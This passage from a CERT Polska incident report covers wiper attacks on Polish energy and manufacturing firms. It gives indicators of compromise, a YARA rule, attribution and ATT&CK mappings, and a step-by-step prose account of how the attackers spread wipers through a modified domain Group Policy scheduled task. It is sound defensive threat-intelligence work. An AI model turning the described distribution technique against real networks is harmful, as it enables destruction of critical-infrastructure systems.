.cfe, .acd, .xsd, .vbm, .vhd, .vsdx, .vsd, .jpg, .prj, .nwf, .dll, .nwd, .sln, .log, .jpeg, .dt, .1cd, .cad, .ddf, .xls, .nwc, .dat, .xml, .doc, .docx, .adt, .proj, .img, .sql, .vib, .txt, .sta, .xdw, .epf, .bak, .vss, .cfl, .bkp, .dwg, .pdf, .ger, .exe FIG. 29  � FIG. 30  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 34 Analyzed LazyWiper sampleTABLE 2  � Sha256 Filename 033cb31c081ff4292f82e528f5cb78a503816462daba8cc18a6c4531009602c2 KB284726.ps1 Wipers Distribution Method The malware used in the incident involving renewable energy farms was exe‑ cuted directly on the HMI machine. In contrast, in the CHP plant (DynoWiper) and the manufacturing sector company (LazyWiper), the malware was distrib‑ uted within the Active Directory domain via a PowerShell script executed on a domain controller. Initial fragment of the malware distribution script The purpose of the script was to create a GPO‑based task. Two versions were identified, differing only in the path to the executable file. The script op‑ erates as follows: • It creates a backup of the existing “Default Domain Policy” GPO. • It modifies the policy, changing (among other things): FIG. 31  � ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 35 • GPOGuid to a new value generated using [GUID]::NewGuid() • DisplayName to “Custom Domain Policy” • MachineVersionNumber to „262148”. • It defines a ScheduledTask that: • Executes with NT AUTHORITY \SYSTEM privileges and the highest available RunLevel, • Launches the file previously uploaded by the attacker to a network share, • Deletes itself using the command schtasks.exe /delete /TN „Custom GPO Task” /F. • It then “restores” the modified backup, which results in the creation of the task defined above. • Finally, it removes the files „C:\Windows\Temp\manifest.xml”, „C:\Windows\Temp\{$backupId}\*”. The script is very simple and does not exhibit many unique distinguishing characteristics, aside from: • the policy name “Custom Domain Policy”, • the name of the created task “Custom GPO Task”, • the task filter GUID “79A87EBB-4DF6-4541-9530-CAD8BEE8A7AD”. Analyzed versions of the malware distribution scriptTABLE 3  � Sha256 Filename 8759e79cf3341406564635f3f08b2f333b0547c444735dba54ea6fce8539cf15 dynacon_update.ps1 f4e9a3ddb83c53f5b7717af737ab0885abd2f1b89b2c676d3441a793f65ffaee exp.ps1 ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 36 Attribution CERT Polska analyzed the infrastructure used in the attack described in the chapter “Indicators of Compromise.” The analysis of the direct infrastructure showed that the attacker used, among other things, compromised VPS serv‑ ers and compromised Cisco routers. Using commercial data sources, includ‑ ing network flow monitoring, additional related compromised devices were also identified, showing almost identical characteristics to those used to car‑ ry out the attack. CERT Polska compared the characteristics of these devices with public‑ ly described types of anonymizing infrastructure used by APT groups. Based on the available information and in consultation with threat intelligence com‑ panies regarding the reconstructed communication between the devices, it was determined that this communication largely overlaps with what was de‑ scribed by Cisco1 and the FBI2, and is used by an activity cluster known pub‑ licly as “Static Tundra” (Cisco), “Berserk Bear” (CrowdStrike), “Ghost Blizzard” (Microsoft), and “Dragonfly” (Symantec). Public reports of this actor’s activi‑ ties indicate significant interest in the energy sector and the ability to attack in‑ dustrial devices, which aligns with the actions observed during the incident. However, this is the first publicly described destructive activity attributed to this cluster. Based on the collected data, CERT Polska concludes that the infrastruc‑ ture used to obtain initial access, exfiltrate data, establish VPN tunnels for wiper malware deployment, and damage the server’s RAID array disks over‑ laps with the “Static Tundra” infrastructure. CERT Polska also analyzed the malicious software used in the attack and compared it to malware historically used in similar attacks. • The DynoWiper malware contains certain similarities to wiper-type tools3 associated with the activity cluster publicly known as “Sandworm” and “SeashellBlizzard”. Despite identifying commonalities in behavioral char‑ acteristics and overall architecture, the level of similarity is too low to at‑ tribute DynoWiper to previously used wiper families. 1 https://blog.talosintelligence. com/static-tundra/ 2 https://www.ic3.gov/ PSA /2025/PSA250820 3 E.g. publicly available sample: bfda142bc5c44913 eed9ef1cf2a8ad07 b7a71312a26e4c7c 519bf1a3fedeb6a0 https://blog.talosintelligence.com/static-tundra/ https://blog.talosintelligence.com/static-tundra/ https://www.ic3.gov/PSA/2025/PSA250820 https://www.ic3.gov/PSA/2025/PSA250820 ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 37 • The PowerShell script used to run DynoWiper on workstations uses the same technique as tools linked to the “Sandworm” cluster, previously used to deploy wipers such as ArguePatch4 or RansomBoggs5, but its source code shares no similarities with the previously described tools. • The LazyWiper script was likely generated largely by an LLM and does not contain distinctive features. For this reason, it cannot be used in attribution. Publicly available reports of this actor’s activities indicate that they have historically carried out destructive operations in Ukraine many times, includ‑ ing against entities in the energy sector (BlackEnergy), as well as against enti‑ ties in Poland (PrestigeRansomware). However, given the very general nature of the detected similarities and the lack of strong links to known tools, CERT Polska cannot conclusively determine whether the actor behind the “Sand‑ worm” activity cluster participated in the attack to any extent. 4 https://www.welivese‑ curity.com/2022/05/20/ sandworm-ukraine-new-ver‑ sion-arguepatch-malware-load‑ er/ 5 https://www.welivese‑ curity.com/2022/11/28/ ransomboggs-new-ransom‑ ware-ukraine/ https://www.welivesecurity.com/2022/05/20/sandworm-ukraine-new-version-arguepatch-malware-loader/ https://www.welivesecurity.com/2022/05/20/sandworm-ukraine-new-version-arguepatch-malware-loader/ https://www.welivesecurity.com/2022/05/20/sandworm-ukraine-new-version-arguepatch-malware-loader/ https://www.welivesecurity.com/2022/05/20/sandworm-ukraine-new-version-arguepatch-malware-loader/ https://www.welivesecurity.com/2022/05/20/sandworm-ukraine-new-version-arguepatch-malware-loader/ https://www.welivesecurity.com/2022/11/28/ransomboggs-new-ransomware-ukraine/ https://www.welivesecurity.com/2022/11/28/ransomboggs-new-ransomware-ukraine/ https://www.welivesecurity.com/2022/11/28/ransomboggs-new-ransomware-ukraine/ https://www.welivesecurity.com/2022/11/28/ransomboggs-new-ransomware-ukraine/ ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 38 Indicators of Compromise To enable independent analysis, all of the files referenced below have been uploaded to platforms used for malware analysis and sharing. In particular, the samples are available free of charge on the https://mwdb.cert.pl/. Sha256 Hashes Filename File type Sha256 dynacom_update.ps1 PowerShell distributing DynoWiper 8759e79cf3341406564635f3f08b2f33 3b0547c444735dba54ea6fce8539cf15 exp1.ps1 PowerShell distributing DynoWiper f4e9a3ddb83c53f5b7717af737ab0885 abd2f1b89b2c676d3441a793f65ffaee Source.exe DynoWiper 65099f306d27c8bcdd7ba3062c012d24 71812ec5e06678096394b238210f0f7c dynacom_update.exe DynoWiper 835b0d87ed2d49899ab6f9479cddb8b4 e03f5aeb2365c50a51f9088dcede68d5 schtask.exe DynoWiper 60c70cdcb1e998bffed2e6e7298e1ab6 bb3d90df04e437486c04e77c411cae4b schtask.exe DynoWiper d1389a1ff652f8ca5576f10e9fa2bf8e 8398699ddfc87ddd3e26adb201242160 KB284726.ps1 LazyWiper 033CB31C081FF4292F82E528F5CB78A5 03816462DABA8CC18A6C4531009602C2 The following hash has been retrieved from logs, we have not obtained copy of the sample to analyze. Filename File type Sha256 dynacom_update.ps1 Probably original PowerShell distributing DynoWiper 68192CA0FDE951D973EB41A07814F402 F2B46E610889224BD54583D8A332A464 https://mwdb.cert.pl/ ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 39 Network Indicators IP Observed period Details 185.200.177[.]10 December 2025 VPN and Microsoft 365 logins. Used against multiple entities. Direct execution of DynoWiper. Compromised server. 31.172.71[.]5 31.172.71[.]5:50443/TCP 31.172.71[.]5:8008/TCP 31.172.71[.]5:44445/TCP December 2025 Reverse proxy used for data exfiltration. Compromised server. 193.200.17[.]163 November 2025 VPN logins. Used against multiple entities. Compromised server. 185.82.127[.]20 November 2025 VPN logins. 41.111.178[.]225 November 2025 VPN logins. 72.62.35[.]76 December 2025 VPN and O365 logins. Compromised server. 89.116.111[.]143 December 2025 VPN logins. 194.61.121[.]178 December 2025 VPN logins. 159.69.50[.]242 December 2025 VPN logins. 159.69.50[.]242 November 2025 VPN logins. Detection Rules DynoWiper rule DynoWiper { meta: author = "CERT Polska" date = "2025-12-31" hash = "4ec3c90846af6b79ee1a5188eefa3fd21f6d4cf6" hash = "86596a5c5b05a8bfbd14876de7404702f7d0d61b" hash = "69ede7e341fd26fa0577692b601d80cb44778d93" hash = "0e7dba87909836896f8072d213fa2da9afae3633" strings: $a1 = "$recycle.bin" wide $a2 = "program files(x86)" wide $a3 = "perflogs" wide $a4 = "windows\x00" wide $b1 = "Error opening file: " wide condition: uint16(0) == 0x5A4D and filesize < 500KB and 4 of them } ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 40 MITRE ATT&CK Enterprise Technique ID Description INITIAL ACCESS External Remote Services T1133 Use of Fortinet edge devices to gain infrastructure access Valid Accounts: Local Accounts T1078.003 Login to a Fortinet device within a manufacturing sector enterprise EXECUTION Scheduled Task/Job: Scheduled Task T1053.005 Distribution of the wiper within the domain using a Scheduled Task System Services: Service Execution T1569.002 Execution of commands using the PsExec tool PERSISTENCE External Remote Services T1133 Use of FortiGate VPN to connect to compromised entities Valid Accounts: Local Accounts T1078.003 Use of local FortiGate VPN accounts to connect to compromised entities Scheduled Task/Job T1053 Creation of scripts on FortiGate devices for administrator credential theft and configuration modification PRIVILEGE ESCALATION Access Token Manipulation T1134 Credential theft from the LSASS Service Privilege escalation via a Process Token Valid Accounts: Local Accounts T1078.003 Use of an account with administrative privileges on the edge device DEFENSE EVASION Domain or Tenant Policy Modification: Group Policy Modification T1484.001 Distribution of the wiper within the domain via modification of the “Default Domain Policy” GPO File and Directory Permissions Modification T1222 Modification of file permissions by the wiper ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 41 Technique ID Description Impair Defenses: Disable or Modify Network Device Firewall T1562.013 Modification of FortiGate device configuration Indicator Removal: File Deletion T1070.004 Deletion of files created during execution by the wiper CREDENTIAL ACCESS OS Credential Dumping T1003 Credential theft from the LSASS Service, NTDS, and SAM/SYSTEM Steal or Forge Kerberos Tickets T1558 Creation of the Diamond Ticket DISCOVERY Account Discovery T1087 Reading the contents of the Users directory File and Directory Discovery T1083 Reading the contents of the Users directory Local Storage Discovery T1680 Creation by the wiper of a list of disks visible to the system Network Service Discovery T1046 Enumeration of services available on the network Network Share Discovery T1135 Enumeration of SMB resources available on the network Process Discovery T1057 Enumeration of processes running on the system Remote System Discovery T1018 Enumeration of systems available on the network System Network Configuration Discovery T1016 Retrieval of the routing table and ARP cache System Network Connections Discovery T1049 Enumeration of network connections System Owner/User Discovery T1033 Reading the contents of the Users directory LATERAL MOVEMENT Remote Services T1021 Use of RDP to connect to devices in the internal network ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 42 Technique ID Description COLLECTION Data from Configuration Repository: Network Device Configuration Dump T1602.002 Dumping firewall device configuration COMMAND AND CONTROL Hide Infrastructure T1665 Use of compromised infrastructure for communication Ingress Tool Transfer T1105 Downloading tools from Dropbox Proxy T1090 Use of reverse SOCKS Proxy and the Tor Network Remote Access Tools: Remote Desktop Software T1219.002 Use of RDP to connect to devices in the internal network EXFILTRATION Exfiltration Over Web Service T1567 Exfiltration of stolen data via HTTP to the attacker‑controlled servers Exfiltration Over Web Service: Exfiltration Over Webhook T1567.004 Transmission of script execution results to a Slack channel IMPACT Data Destruction T1485 File corruption by the wiper Disk Wipe: Disk Structure Wipe T1561.002 Modification of RAID array configuration Inhibit System Recovery T1490 Change of IP addressing on compromised devices System Shutdown/ Reboot T1529 Device shutdown performed by the wiper ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 43 MITRE ATT&CK ICS Technique ID Description INITIAL ACCESS External Remote Services T0822 Use of Fortinet edge devices to gain access to renewable energy farms Remote Services T0886 Connecting to industrial automation devices via compromised edge devices EXECUTION Command-Line Interface T0807 Execution of commands on controllers Graphical User Interface T0823 RDP connection to an HMI computer PERSISTENCE Valid Accounts T0859 Use of default system accounts DISCOVERY Network Connection Enumeration T0840 Enumeration of network connections on the HMI computer Remote System Discovery T0846 Network scanning for industrial automation devices Remote System Information Discovery T0888 Identification of industrial automation devices (e.g. to leverage appropriate credentials) LATERAL MOVEMENT Default Credentials T0812 Use of default system accounts Remote Services T0886 Connectivity to industrial automation devices within the internal network (including SSH, RDP) Valid Accounts T0859 Use of default system accounts COLLECTION Screen Capture T0852 Screenshot capture of industrial automation devices ENERGY SECTOR INCIDENT REPORT – 29 DECEMBER 44 Technique ID Description INHIBIT RESPONSE FUNCTION Change Credential T0892 Password changes on compromised Moxa NPort devices Data Destruction T0809 Deletion of files from Mikronika RTU controllers Device Restart/Shutdown T0816 Shutdown of compromised industrial automation devices System Firmware T0857 Deployment of corrupted firmware preventing controller startup IMPAIR PROCESS CONTROL Module Firmware T0892 Deployment of corrupted firmware preventing controller startup IMPACT Loss of Control T0827 Damage to RTU controllers resulting in loss of communication between the facility and the DSO Loss of View T0829 Damage to RTU controllers resulting in loss of communication between the facility and the DSO Ministry of Digital Affairs Republic of Poland CERT.PL > ; Introduction Attack on Renewable Energy Plants Architecture of a Renewable Energy Facility Attack Vector on the GCP Destructive Activities Attack on the Large CHP Plant Attack on a Manufacturing Sector Company Initial Access Modification of FortiGate Configuration for Persistence Activities Against Cloud Services Malware Analysis DynoWiper LazyWiper Wipers Distribution Method Attribution Indicators of Compromise Detection Rules MITRE ATT&CK Enterprise MITRE ATT&CK ICS